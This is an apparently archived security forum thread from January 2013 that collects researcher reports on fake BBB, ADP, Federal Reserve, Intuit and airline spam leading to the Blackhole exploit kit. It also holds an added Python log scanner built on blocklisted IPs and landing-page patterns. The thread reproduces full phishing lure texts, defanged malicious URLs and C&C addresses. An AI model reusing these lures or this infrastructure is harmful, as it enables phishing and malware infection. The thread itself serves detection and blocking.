From: Federal Reserve Services @ sys.frb .org [ACHR_59273219 @fedmail .frb .org]
Date: 8 January 2013 15:11
Subject: FedMail (R): Federal ACH Announcement - End of Day - 12/27/12
Please find the ACH Letter of Advice Reporting from the Federal Reserve System clicking here.
The link in the email goes to an exploit kit on [donotclick]cookingcarlog .net/detects/occasional-average-fairly.php (report here*) which is hosted on 89.207.132.144 (Snel Internet Services, Netherlands).
* http://wepawet.iseclab.org/view.php?hash=113ca923e70652baad7b97e758bde34b&t=1357658280&type=js
Added - a BBB spam is also doing the rounds with the same payload:
Better Business Bureau ©
Start With Trust ©
Mon, 7 Jan 2013
RE: Case N. 54809787
[redacted]
The Better Business Bureau has been recorded the above said claim from one of your customers in respect to their dealings with you. The detailed description of the consumer's worry are available for review at a link below. Please pay attention to this issue and communicate with us about your judgment as soon as possible.
We pleasantly ask you to click and review the CLAIM REPORT to meet on this claim letter.
We are looking forward to your prompt response.
WBR
Mason Turner
Dispute Consultant
Better Business Bureau
Better Business Bureau
3063 Wilson Blvd, Suite 600 Arlington, VA 22701
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
___
Fake BBB SPAM / royalwinnipegballet .net
- http://blog.dynamoo.com/2013/01/bbb-spam-royalwinnipegballetnet.html
8 Jan 2013 - "This fake BBB spam leads to malware on royalwinnipegballet .net:
Date: Tue, 8 Jan 2013 19:18:34 +0200 [12:18:34 EST]
From: Better Business Bureau <information @bbb .org>
To: [redacted]
Subject: BBB information regarding your customer's appeal № 96682901
Better Business Bureau ©
Start With Trust ©
Mon, 7 Jan 2013
RE: Complaint # 96682901
[redacted]
The Better Business Bureau has been registered the above mentioned appeal from one of your clients as regards their business contacts with you. The details of the consumer's worry are available for review at a link below. Please give attention to this matter and notify us about your sight as soon as possible.
We graciously ask you to open the CLAIM REPORT to answer on this reclamation.
We are looking forward to your prompt answer.
Faithfully yours
Alex Green
Dispute Counselor
Better Business Bureau
3063 Wilson Blvd, Suite 600 Arlington, VA 27201
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
This note was delivered to [redacted]. Don't want to receive these emails anymore? You can unsubscribe
===
Date: Tue, 8 Jan 2013 19:12:58 +0200 [12:12:58 EST]
From: Better Business Bureau <donotreply @bbb .org>
Subject: Better Business Beareau Pretense № C6273504
Priority: High Priority 1
Better Business Bureau ©
Start With Trust ©
Mon, 7 Jan 2013
RE: Issue No. C6273504
[redacted]
The Better Business Bureau has been registered the above said reclamation from one of your users in respect of their business contacts with you. The information about the consumer's anxiety are available visiting a link below. Please give attention to this problem and notify us about your mind as soon as possible.
We kindly ask you to overview the APPEAL REPORT to meet on this claim letter.
We are looking forward to your prompt rebound.
Yours respectfully
Julian Morales
Dispute Advisor
Better Business Bureau
3013 Wilson Blvd, Suite 600 Arlington, VA 20701
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
This message was sent to [redacted]. Don't want to receive these emails anymore? You can unsubscribe
The malicious payload is on [donotclick]royalwinnipegballet .net/detects/occasional-average-fairly.php hosted on 89.207.132.144 (Snel Internet, Netherlands) which was hosting another attack site this morning (so best blocked in my opinion)
:mad::mad::mad:
AplusWebMaster
2013-01-09, 15:19
FYI...
Fake AICPA emails serve client-side exploits and malware
- http://blog.webroot.com/2013/01/09/spamvertised-aicpa-themed-emails-serve-client-side-exploits-and-malware/
Jan 9, 2013 - "... recently spamvertised campaigns impersonating the American Institute of Certified Public Accountants, also known as AICPA...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/aicpa_email_spam_exploits_malware_black_hole_exploit_kit.png
Second screenshot of the spamvertised email from the same campaign:
> https://webrootblog.files.wordpress.com/2013/01/aicpa_email_spam_exploits_malware_black_hole_exploit_kit_01.png
Sample subjects: Tax return assistance contrivance; Suspension of your CPA license; Revocation of your CPA license; Your accountant license can be end off; Your accountant CPA License Expiration...
Upon successful client-side exploitation, the campaign drops MD5: 5b7aafd9ab99aa2ec0e879a24610844a * ... Worm:Win32/Cridex.E.
Once executed, the sample performs the following actions:
Creates a batch script
Accesses Firefox’s Password Manager local database
Creates a thread in a remote process
Installs a program to run automatically at logon
It also drops the following MD5 on the affected hosts: MD5: 3e2df81077283e5c9d457bf688779773 ** ... PWS:Win32/Fareit.
It also phones back to the following C&C servers:
(C&C list at the webroot URL above.)
We’ve also seen and profiled the same IP (132.248.49.112) in multiple previously analyzed malware campaigns..."
* https://www.virustotal.com/file/5f99e67f2208171e4a43039555456f12e7ae3c0b8974e88e4bc59800c68e2e12/analysis/
File name: contacts.exe
Detection ratio: 31/45
Analysis date: 2012-12-18
** https://www.virustotal.com/file/292554dd80874a86f085f4432327fdc08022f7774537b7ef72e424541e09d67d/analysis/
File name: exp3C6.tmp.exe
Detection ratio: 27/45
Analysis date: 2013-01-04
___
New Year, New Old Threats
- http://www.gfi.com/blog/new-year-new-old-threats/
Jan 9, 2013 - "... we have found an old Facebook scam, which dates back from two years ago, making rounds again and a spam-phishing ploy that is so 2007...
(Screenshots available at the gfi URL above.)
Previous versions of this scam usually asks visitors to click “Like” buttons for pages, a method usually employed for the purpose of increasing the popularity of pages and their monetary value once sold. For the scam to proliferate within the network, users are also asked to update their Facebook profile with the above status message and link. Some versions present either a list of surveys to fill in or a form where users can enter their mobile numbers; only this latest scam offers both... Our researchers in the AV Labs found an in-the-wild email spam leading to a phishing attack. It targets users of the open-source webmail application, SquirrelMail... The email is exactly as it was back in 2007, so any user can take their cues from the outdated versions of the app mentioned and the supposed solution to the issue the email is attempting to address... advice? Delete the spam at once."
___
Something evil on 173.246.102.246
- http://blog.dynamoo.com/2013/01/something-evil-on-173246102246.html
9 Jan 2013 - "173.246.102.246 (Gandi, US) looks like it is being used for exploit kits being promoted either through malvertising or through exploited OpenX ad servers. In the example I have seen, the malicious payload is at [donotclick]11.lamarianella .info/read/defined_regulations-frequently.php (report here*). These other domains appear to be on the same server, all of which can be assumed to be malicious:
(List at the dynamoo URL above.)
These all appear to be legitimate but hijacked domains; you may want to block the whole domain rather than just the 11. subdomain."
* http://wepawet.iseclab.org/view.php?hash=1e0711361dfe5801ffc4ce7b14e4a3f1&type=js
> https://www.google.com/safebrowsing/diagnostic?site=AS:29169
"... in the past 90 days. We found 67 site(s)... that infected 262 other site(s)..."
___
Fake ADP SPAM / demoralization .ru
- http://blog.dynamoo.com/2013/01/adp-spam-demoralizationru.html
9 Jan 2013 - "This fake ADP spam leads to malware on demoralization .ru:
Date: Wed, 9 Jan 2013 04:23:03 -0600
From: Habbo Hotel [auto-contact @habbo .com]
Subject: ADP Immediate Notification
ADP Immediate Notification
Reference #: 948284271
Wed, 9 Jan 2013 04:23:03 -0600
Dear ADP Client
Your Transfer Record(s) have been created at the web site:
https ://www .flexdirect .adp.com/client/login.aspx
Please see the following notes:
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
This note was sent to acting users in your system that approach ADP Netsecure.
As usual, thank you for choosing ADP as your business affiliate!
Ref: 703814359
HR. Payroll. Benefits.
The ADP logo and ADP are registered trademarks of ADP, Inc.
In the business of your success is a service mark of ADP, Inc.
© 2013 ADP, Inc. All rights reserved.
The malicious payload is at [donotclick]demoralization .ru:8080/forum/links/column.php hosted on the following IPs:
82.165.193.26 (1&1, Germany)
91.224.135.20 (Proservis UAB, Lithuania)
187.85.160.106 (Ksys Soluções Web, Brazil)
The following IPs and domains are all related:
(List at the dynamoo URL above.)"
___
Fake BBB SPAM / hotelrosaire .net
- http://blog.dynamoo.com/2013/01/bbb-spam-hotelrosairenet.html
9 Jan 2013 - "This fake BBB spam leads to malware on hotelrosaire .net:
Date: Wed, 9 Jan 2013 09:21:32 -0600 [10:21:32 EST]
From: Better Business Bureau <complaint @bbb .org>
Subject: BBB notification regarding your cliente's pretense No. 62850348
Better Business Bureau ©
Start With Trust ©
Tue, 8 Jan 2013
RE: Complaint N. 62850348
[redacted]
The Better Business Bureau has been booked the above said complaint from one of your users in regard to their business contacts with you. The detailed description of the consumer's anxiety are available for review at a link below. Please give attention to this problem and inform us about your sight as soon as possible.
We pleasantly ask you to click and review the APPEAL REPORT to respond on this claim letter.
We awaits to your prompt reaction.
Yours respectfully
Liam Barnes
Dispute Consultant
Better Business Bureau
3053 Wilson Blvd, Suite 600 Arlington, VA 25501
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
This note was sent to [redacted]. Don't want to receive these emails anymore? You can unsubscribe
========
Date: Wed, 9 Jan 2013 23:21:42 +0800 [10:21:42 EST]
From: Better Business Bureau <donotreply @bbb .org>
Subject: BBB Complaint No. C1343110
Better Business Bureau ©
Start With Trust ©
Tue, 8 Jan 2013
RE: Case No. C1343110
[redacted]
The Better Business Bureau has been booked the above mentioned complaint from one of your clients as regards their business relations with you. The information about the consumer's anxiety are available for review at a link below. Please pay attention to this question and inform us about your glance as soon as possible.
We pleasantly ask you to overview the COMPLAINT REPORT to reply on this grievance.
We are looking forward to your prompt reaction.
Yours respectfully
Hunter Gomez
Dispute Counselor
Better Business Bureau
Better Business Bureau
3053 Wilson Blvd, Suite 600 Arlington, VA 22801
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
This message was sent to [redacted]. Don't want to receive these emails anymore? You can unsubscribe
The malicious payload is on [donotclick]hotelrosaire .net/detects/keyboard_ones-piece-ring.php hosted on 64.120.177.139 (HostNOC, US) which also hosts royalwinnipegballet .net which was seen in another BBB spam run yesterday."
>> https://www.google.com/safebrowsing/diagnostic?site=AS:21788
"... in the past 90 days. We found 543 site(s).. that infected 5049 other site(s)..."
:mad::mad:
AplusWebMaster
2013-01-10, 15:25
FYI...
Fake U.S Airways emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/01/10/please-confirm-your-u-s-airways-online-registration-themed-emails-lead-to-black-hole-exploit-kit/
Jan 10, 2013 - "... On numerous occasions, we intercepted related campaigns attempting to trick customers into clicking on malicious links, which ultimately exposed them to the client-side exploits served by the latest version of the BlackHole Exploit Kit. Apparently, the click-through rates for these campaigns were good enough for cybercriminals to resume spamvertising related campaigns. In this post, I’ll profile the most recently spamvertised campaign impersonating U.S Airways...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/us_airways_email_spam_exploits_malware_black_hole_expoit_kit.png
... Malicious domain name reconnaissance:
attachedsignup .pro – 41.215.225.202 – Email: kee_mckibben0869 @macfreak .com
... Upon successful client-side exploitation, the campaign drops MD5: 6f51e309530f8900be935716c3015f58 * ... Worm:Win32/Cridex.E
The executable creates the following registry entries:
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CFBDC89D4
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\S25BC2D7B
As well as a number of mutexes (listed at the webroot URL above).
Once executed, the sample phones back to the following C&C servers:
180.235.150.72 :8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
174.143.174.136 :8080/AJtw/UCyqrDAA/Ud+asDAA/
We’ve already seen the same pseudo-random C&C phone back characters used... previously profiled malicious campaigns..."
* https://www.virustotal.com/file/d11fb7812df059253955beebe9a33df807a76d0bcca1ec212faa802de2cbd1fe/analysis/
File name: 6f51e309530f8900be935716c3015f58
Detection ratio: 24/46
Analysis date: 2012-12-07
___
Fake ADP SPAM / tetraboro .net and advertizing* .com
- http://blog.dynamoo.com/2013/01/adp-spam-tetraboronet-and-advertizingcom.html
10 Jan 2013 - "This fake ADP spam leads to malware on tetraboro .net. It contains some errors, one of which is that the subject line just says "adp_subj" rather than having been filled out properly...
Date: Thu, 10 Jan 2013 17:48:09 +0200 [10:48:09 EST]
From: "ADPClientServices @adp .com" [ADPClientServices @adp .com]
Subject: adp_subj
ADP Urgent Note
Note No.: 33469
Respected ADP Consumer January, 9 2013
Your Processed Payroll Record(s) have been uploaded to the web site:
Click here to Sign In
Please take a look at the following details:
• Please note that your bank account will be debited within one banking day for the amount(s) specified on the Protocol(s).
Please don't reply to this message. auomatic informational system not configured to accept incoming mail. Please Contact your ADP Benefits Specialist.
This notification was sent to current clients in your company that approach ADP Netsecure.
As general, thank you for choosing ADP as your business butty!
Ref: 33469
The malicious payload is on [donotclick]tetraboro .net/detects/coming_lost-source.php hosted on 222.238.109.66 (Hanaro Telecom, Korea). A quick look indicates a number of related malicious domains and IPs, including advertizing1 .com through to advertizing9 .com. All of these should be blocked.
(Long list at the dynamoo URL above.)"
:mad:
AplusWebMaster
2013-01-11, 16:10
FYI...
Fake Chrome updates return ...
- http://www.gfi.com/blog/fake-google-chrome-updates-return/
Jan 11, 2013 - "... fake Chrome update websites leading to Malware – has returned...
> http://www.gfi.com/blog/wp-content/uploads/2013/01/googchromefake1.jpg
The design of the website is identical to the initial rollout, urging the end-user to “Update Google Chrome: To make sure that you’re protected by the latest security updates”. If you attempt to download the file while using Chrome, the following prompt appears...
> http://www.gfi.com/blog/wp-content/uploads/2013/01/googchromefake2.jpg
The file itself has been around for a while, being seen on around 14 or so websites since around October and is listed at Malwr.com which mentions attempts to access Firefox’s Password Manager local database – meanwhile, it’s listed on the comments section of VirusTotal* as being capable of stealing banking credentials. You’ll notice they mention Zeus – indeed, one of the DNS requests made by the Malware is to a site related to ZBot / Blackhole exploit kit attacks. In fact, it seems to want to swipe information of a very similar nature to a ZBot infection from August of 2012 detailed on the ShadowServer Blog** (scroll down to the “data it tries to collect and steal”)... users of Chrome curious about updates should simply read the information on the relevant Google Chrome support page***".
* https://www.virustotal.com/file/19d087ddaadf8fc3d5b8a422dc303e6ea6cdac2a55b4b14e9f28aec9c8902439/analysis/
** http://blog.shadowserver.org/2012/08/14/beware-the-trolls-secure-your-trackers/
*** https://support.google.com/chrome/bin/answer.py?hl=en&answer=95414
___
Fake Changelog SPAM / dimanakasono .ru
- http://blog.dynamoo.com/2013/01/changelog-spam-dimanakasonoru.html
11 Jan 2013 - "This fake "Changelog" spam leads to malware on dimanakasono .ru:
From: Ashley Madison [mailto:donotreply @ashleymadison .com]
Sent: 10 January 2013 08:25
Subject: Re: Fwd: Changelog as promised(updated)
Hi,
changelog update - View
L. Cook
The malicious payload is at [donotclick]dimanakasono .ru:8080/forum/links/column.php hosted on the following IPs:
91.224.135.20 (Proservis UAB, Lithuania)
187.85.160.106 (Ksys Soluções Web, Brazil)
212.112.207.15 (ip4 GmbH, Germany)
The following IPs and domains are related and should be blocked:
(List at the dynamoo URL above.)
___
Fake Intuit SPAM / dmeiweilik .ru
- http://blog.dynamoo.com/2013/01/payroll-account-holded-by-intuit-spam.html
11 Jan 2013 - "This fake Intuit (or LinkedIn?) spam leads to malware on dmeiweilik .ru:
Date: Fri, 11 Jan 2013 06:23:41 +0100
From: LinkedIn Password [password @linkedin .com]
Subject: Payroll Account Holded by Intuit
Direct Deposit Service Informer
Communicatory Only
We cancelled your payroll on Fri, 11 Jan 2013 06:23:41 +0100.
Finances would be gone away from below account# ending in 0198 on Fri, 11 Jan 2013 06:23:41+0100
amount to be seceded: 8057 USD
Paychecks would be procrastinated to your personnel accounts on: Fri, 11 Jan 2013 06:23:41 +0100
Log In to Review Operation
Funds are typically left before working banking hours so please make sure you have enough Finances accessible by 12 a.m. on the date Cash are to be seceded.
Intuit must reject your payroll by 4 p.m. Central time, two banking days before your paycheck date or your state would not be paid on time.
QuickBooks does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be viewed at the Federal Reserve website.
Thank you for your business.
Regards,
Intuit Payroll Services
=====
From: messages-noreply @bounce .linkedin.com [mailto:messages-noreply @bounce .linkedin.com] On Behalf Of Lilianna Grimes via LinkedIn
Sent: 10 January 2013 21:04
Subject: Payroll Account Holded by Intuit
Direct Deposit Service Informer
Communicatory Only
We cancelled your payroll on Fri, 11 Jan 2013 02:03:33 +0500.
• Finances would be gone away from below account # ending in 8913 on Fri, 11 Jan 2013 02:03:33 +0500
• amount to be seceded: 9567 USD
• Paychecks would be procrastinated to your personnel accounts on: Fri, 11 Jan 2013 02:03:33 +0500
• Log In to Review Operation
Funds are typically left before working banking hours so please make sure you have enough Finances accessible by 12 a.m. on the date Cash are to be seceded.
Intuit must reject your payroll by 4 p.m. Central time, two banking days before your paycheck date or your state would not be paid on time.
QuickBooks does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be viewed at the Federal Reserve website.
Thank you for your business.
Regards,
Intuit Payroll Services
The malicious payload is at [donotclick]dmeiweilik .ru:8080/forum/links/column.php hosted on the same IPs as in this attack*:
91.224.135.20 (Proservis UAB, Lithuania)
187.85.160.106 (Ksys Soluções Web, Brazil)
212.112.207.15 (ip4 GmbH, Germany)
The following IPs and domains are related and should be blocked ..."
* http://blog.dynamoo.com/2013/01/changelog-spam-dimanakasonoru.html
___
Blackhole SPAM runs...
- http://blog.trendmicro.com/trendlabs-security-intelligence/blackhole-spam-runs-return-from-holiday-break/
Jan 11, 2013 - "... now that the holidays are over, cybercriminals behind BHEK campaigns are back again, this time spoofing companies like HP, Federal Reserve Bank*, and Better Business Bureau**. In particular, the Better Business Bureau BHEK spam** claims to be a complaint report and urges its recipients to click a link pointing to the said claim letter report. The links eventually lead to sites that host the Blackhole Exploit Kit... we are expecting that cybercriminals will prefer creating more toolkits rather than making new malware..."
* http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/01/ACH_bhekspam.jpg
** http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/01/BBB_BHEKspam.jpg
:mad:
AplusWebMaster
2013-01-14, 14:22
FYI...
Malware sites to block 14/1/13
- http://blog.dynamoo.com/2013/01/malware-sites-to-block-14113.html
14 Jan 2013 - "A couple of interesting* posts** over at Malware Must Die!*
* http://malwaremustdie.blogspot.co.uk/2013/01/once-upon-time-with-cool-exploit-kit.html
** http://malwaremustdie.blogspot.co.uk/2013/01/decoding-guide-double-obfuscation.html
... showed some significant nastiness on a few IP ranges you might want to block. The IPs mentioned are:
1.243.115.140 (Aztek Ltd, Russia)
46.166.169.238 (Santrex, Netherlands)
62.76.184.93 (IT House / Clodo-Cloud, Russia)
I'll list the sites on these domains at the end of the post for readability. But in these cases, blocking just the single IPs is not enough as they reside in pretty evil netblocks which should be blocked altogether.
91.243.115.0/24 (Aztek Ltd) is part of this large collection of malware hosts. Perhaps not all sites in the network are malicious, but certainly a lot of them are. I would err on the side of caution and block access to all sites in this /24, legitimate or not.
46.166.169.0/24 (Santrex) is another horrible network. According to Google, out of 4604 tested sites in this block, at least 3201 (70%) are involved in malware distribution. There may be legitimate sites in this /24, but since customer service is allegedly atrocious then it's hard to see why they would stick around. Again, blocking this /24 is probably prudent.
62.76.184.0/21 (IT House / Clodo-Cloud) is quite a large range to block, but I have seen many malicious sites in this range, and like Aztek it is part of this large network of malware hosts and it has a poor reputation. This is only a part of this netblock, if you want to go further you could consider blocking 62.76.160.0/19.
These following domains are all connected to these two attacks..."
(Also a long list available at the dynamoo URL above.)
___
Fake ADP emails lead to client-side exploits and malware
- http://blog.webroot.com/2013/01/14/fake-adp-speedy-notifications-lead-to-client-side-exploits-and-malware/
14 Jan 2013 - "... cybercriminals have resumed spamvertising fake “ADP Immediate Notifications” in an attempt to trick users into clicking on the malicious links found in the emails. The links point to the latest version of the Black Hole Exploit Kit, and consequently, exploit CVE-2013-0422...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/01/email_spam_adp_speedy_notification_fake_malware_exploits_black_hole_exploit_kit.png
... Malicious domain name reconnaissance:
tetraboro .net – 222.238.109.66 – Email: bannerpick45 @yahoo .com
Name Server: NS1.HOSTCLAM .NET – 50.115.163.10
Name Server: NS2.HOSTCLAM .NET – 90.167.194.23
Responding to 222.238.109.66 are also the following malicious campaigns part of the campaign:
royalwinnipegballet .net
advertizing9 .com
eartworld .net
hotelrosaire .net
Upon successful client-side exploitation, the campaign drops MD5: 5a859e1eff1ee1576b61da658542380d * ... Worm:Win32/Cridex.E.
The sample drops the following MD5 on the affected hosts:
MD5: 472d6e748b9f5b02700c55cfa3f7be1f ** ...PWS:Win32/Fareit
Once executed, it also phones back to the following command and control servers:
173.201.177.77
132.248.49.112
95.142.167.193
81.93.250.157 ..."
* https://www.virustotal.com/file/69d9152b45fe6e9da8df13f28d2fc1f34bcc6974f9946d569dfc8f761f883b3b/analysis/
File name: test29567554014546.bin
Detection ratio: 24/46
Analysis date: 2013-01-14
** https://www.virustotal.com/file/baab82eb7c03dcfd7da9a6f0d410f7b948c3d742910217904e67cd71eb36e596/analysis/
File name: file-5000060_exe
Detection ratio: 15/46
Analysis date: 2013-01-11
___
Fake ADP SPAM / dekamerionka .ru
- http://blog.dynamoo.com/2013/01/adp-spam-dekamerionkaru.html
14 Jan 2013 - "This fake ADP spam leads to malware on dekamerionka .ru:
Date: Mon, 14 Jan 2013 10:49:06 +0300
From: Friendster Games [friendstergames @friendster .com]
Subject: ADP Immediate Notification
ADP Immediate Notification
Reference #: 540328394
Mon, 14 Jan 2013 10:49:06 +0300
Dear ADP Client
Your Transfer Record(s) have been created at the web site:
https ://www.flexdirect .adp.com/client/login.aspx
Please see the following notes:
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
This note was sent to acting users in your system that approach ADP Netsecure.
As usual, thank you for choosing ADP as your business affiliate!
Ref: 984259785
HR. Payroll. Benefits.
The ADP logo and ADP are registered trademarks of ADP, Inc.
In the business of your success is a service mark of ADP, Inc.
© 2013 ADP, Inc. All rights reserved.
The malicious payload is on [donotclick]dekamerionka.ru:8080/forum/links/column.php hosted on:
81.31.47.124 (Master Internet s.r.o / Petr Bydzovsky, Czech Republic)
91.224.135.20 (Proservis UAB, Lithuania)
212.112.207.15 (ip4 GmbH, Germany)
Plain list of IPs and domains involved ...
___
Fake BBB SPAM / terkamerenbos .net
- http://blog.dynamoo.com/2013/01/bbb-spam-terkamerenbosnet.html
14 Jan 2013 - "This fake BBB spam leads to malware on terkamerenbos .net:
Date: Mon, 14 Jan 2013 07:53:04 -0800 [10:53:04 EST]
From: Better Business Bureau [notify @bbb .org]
Subject: BBB Pretense ID 68C474U93
Better Business Bureau ©
Start With Trust ©
Mon, 14 Jan 2013
RE: Issue # 68C474U93
[redacted]
The Better Business Bureau has been booked the above said claim from one of your customers with regard to their business relations with you. The detailed description of the consumer's uneasiness are available at the link below. Please give attention to this subject and notify us about your mind as soon as possible.
We amiably ask you to click and review the CLAIM REPORT to meet on this complaint.
We are looking forward to your prompt reaction.
Best regards
Alexis Nguyen
Dispute Councilor
Better Business Bureau
Better Business Bureau
3033 Wilson Blvd, Suite 600 Arlington, VA 22701
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
This note was delivered to [redacted]. Don't want to receive these emails anymore? You can unsubscribe
The malicious payload is at [donotclick]terkamerenbos .net/detects/pull_instruction_assistant.php hosted on 222.238.109.66 (Hanaro Telecom, Korea). The following malicious sites are on the same server ...
:mad::mad:
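A defender's check for the indicators discussed in the post above, as an added example (not from dynamoo, Malware Must Die or this thread's author): it scans web-proxy log lines for the two landing-page URL shapes that recur across these campaigns (`:8080/forum/links/column.php` and `/detects/<words>.php`), the single hosts the posts name, and the netblocks the post recommends blocking outright. The log format, the `.invalid` hostnames and the client addresses are constructed for the example.

```python
"""Flag proxy-log requests that match the Blackhole landing patterns and
blocklists from the posts above. Added example; log format is constructed."""
import ipaddress
import re
from urllib.parse import urlsplit

# Netblocks the dynamoo post says to block altogether (from the page).
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "91.243.115.0/24",   # Aztek Ltd
    "46.166.169.0/24",   # Santrex
    "62.76.184.0/21",    # IT House / Clodo-Cloud
)]
# Hosts named repeatedly as payload servers in the posts (from the page).
BLOCKED_HOSTS = {ipaddress.ip_address(a) for a in (
    "222.238.109.66", "91.224.135.20", "187.85.160.106",
    "212.112.207.15", "81.31.47.124", "89.111.176.125",
)}
# Landing-page path shapes seen across the campaigns on this page.
LANDING_PATTERNS = (
    re.compile(r"^/forum/links/column\.php$"),   # <domain>.ru:8080/forum/links/column.php
    re.compile(r"^/detects/[a-z_-]+\.php$"),     # <domain>.net/detects/<words>.php
)
# Constructed log layout: <timestamp> <client_ip> <dest_ip> <url> <status>
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<dest>\S+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)

def classify(url, dest):
    """Return the reasons (possibly none) a request matches the indicators."""
    reasons = []
    path = urlsplit(url).path
    if any(p.match(path) for p in LANDING_PATTERNS):
        reasons.append("landing path " + path)
    try:
        ip = ipaddress.ip_address(dest)
    except ValueError:          # destination logged as a name, not an address
        return reasons
    if ip in BLOCKED_HOSTS:
        reasons.append("blocked host " + dest)
    for net in BLOCKED_NETS:    # a netblock hit is weaker evidence than a named host
        if ip in net:
            reasons.append("blocked net " + str(net))
    return reasons

def scan(lines):
    """Scan log lines; return (hits, malformed line numbers)."""
    hits, malformed = [], []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if not m:
            if line.strip():
                malformed.append(n)   # do not silently drop unparseable records
            continue
        reasons = classify(m["url"], m["dest"])
        if reasons:
            hits.append({"line": n, "client": m["client"], "url": m["url"], "reasons": reasons})
    return hits, malformed

# Constructed sample log: hostnames are placeholders, IPs are from the posts
# (46.166.169.77 and 62.76.190.5 are constructed addresses inside the netblocks).
SAMPLE_LOG = """\
2013-01-14T10:51:07Z 10.0.0.12 91.224.135.20 http://spam-link-target.invalid:8080/forum/links/column.php 200
2013-01-14T10:51:09Z 10.0.0.12 222.238.109.66 http://second-target.invalid/detects/pull_instruction_assistant.php 200
2013-01-14T10:52:00Z 10.0.0.33 46.166.169.77 http://host-in-bad-block.invalid/index.html 200
2013-01-14T10:53:00Z 10.0.0.33 198.51.100.7 http://benign.invalid/forum/links/index.php 200
2013-01-14T10:54:00Z 10.0.0.40 62.76.190.5 http://another.invalid/ 404
this line is not a valid record
"""

def main():
    hits, malformed = scan(SAMPLE_LOG.splitlines())
    for h in hits:
        print(f"line {h['line']}: {h['client']} -> {h['url']}: {', '.join(h['reasons'])}")
    if malformed:
        print("malformed lines:", malformed)

if __name__ == "__main__":
    main()
```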
AplusWebMaster
2013-01-15, 15:53
FYI...
Fake Southwest Airlines Giveaway...
- http://www.gfi.com/blog/fake-southwest-airlines-giveaway-flies-high-once-more/
Jan 15, 2013 - "A fresh campaign of the fake Southwest Airlines free ticket scam has made its way onto Facebook again, this time as an event invite spammed within the network.
Southwest Airlines is giving two tickets to any destination within the United States! To grab yours, just visit [URL here]
Based on the bit.ly data of the URL, it is highly likely that this scam has been going around since the 14th of this month. Once users click the shortened URL, they are redirected to a page where, purportedly, they can claim their free two tickets to the US. The page claims that the offer is only available for a certain period, suggesting that interested parties must act now or else miss this opportunity... Users are advised to ignore this Facebook event invite if they receive it and notify the creator of the invite that their post must be deleted."
(Screenshots available at the gfi URL above.)
___
xree .ru and the persistent pharma SPAM
- http://blog.dynamoo.com/2013/01/xreeru-and-persistent-pharma-spam.html
15 Jan 2013 - "No doubt sent out by the same crew who are pushing malware, this pharma spam seems to have hit new highs.
Date: Tue, 15 Jan 2013 05:35:04 -0500 (EST)
From: Account Mail Sender [invoice @erlas .hu]
Subject: Invoice confirmation
Hello. Thank you for your order.
We greatly appreciate your time and look forward to a mutually rewarding business relationship with our company well into the future.
At present, our records indicate that we have an order or several orders outstanding that we have not received confirmation from you. If you have any questions regarding your account, please contact us.
We will be happy to answer any questions that you may have.
Your Customer Login Page
Customer login: [redacted]
Thanking you in advance for your attention to this matter.
Sincerely, Justa Dayton
The link in the email goes through a legitimate hacked site to [donotclick]xree .ru/?contactus but then it redirects to a seemingly random fake pharma site. However, the redirect only works if you have the referrer set correctly.
The landing sites are on:
199.59.56.59 (Hostwinds, Australia)
209.236.67.220 (WestHost Inc, US)
I can't find any malware on these sites, but you may as well block them if you can as they seem to have a lot of domains on them..."
(Long list of domains available at the dynamoo URL above.)
__
Verizon Wireless SPAM / dmssmgf .ru
- http://blog.dynamoo.com/2013/01/verizon-wireless-spam-dmssmgfru.html
15 Jan - "This fake Verizon Wireless spam leads to malware on dmssmgf .ru:
From: Friendster Games [mailto:friendstergames @friendster .com]
Sent: 14 January 2013 21:47
Subject: Verizon Wireless
IMPORTANT ACCOUNT NOTE FROM VERIZON WIRELESS.
Your acknowledgment message is issued.
Your account No. ending in 2308
Dear Client
For your accommodation, your confirmation letter can be found in the Account Documentation desk of My Verizon.
Please browse your informational message for more details relating to your new transaction.
Open Information Message
In addition, in My Verizon you will find links to information about your device & services that may be helpfull if you looking for answers.
Thank you for joining us. My Verizon is laso works 24 hours 7 days a week to assist you with:
• Viewing your utilization
• Upgrade your tariff
• Manage Account Members
• Pay for your bill
• And much, much more...
2013 Verizon Wireless
Verizon Wireless | One Verizon Way Mail Code: 113WVC | Basking Ridge, MI 87325
We respect your privacy. Please browse our policy for more information
The malicious payload is on [donotclick]dmssmgf .ru:8080/forum/links/column.php (report here) hosted on:
81.31.47.124 (Master Internet s.r.o / Petr Bydzovsky, Czech Republic)
91.224.135.20 (Proservis UAB, Lithuania)
212.112.207.15 (ip4 GmbH, Germany)
The following IPs and domains are all connected ..."
:fear::fear:
AplusWebMaster
2013-01-16, 18:26
FYI...
Fake EFTPS, BBB and Fed Reserve SPAM
- http://www.gfi.com/blog/email-threats-highlights-eftps-bbb-and-federal-reserve-spam/
Jan 16, 2013 - "... the AV Labs have captured and recorded* a number of notable email threats last week — generally spam related to malware...
- Fake BBB Complaints Spam...
- Fake EFTPS Spam...
- FedMail ACH Spam... leads to Cridex
Users are advised to mark the above email threats as spam if they’re found in their inbox and then/or simply delete them."
(Screenshots available at the gfi URL above.)
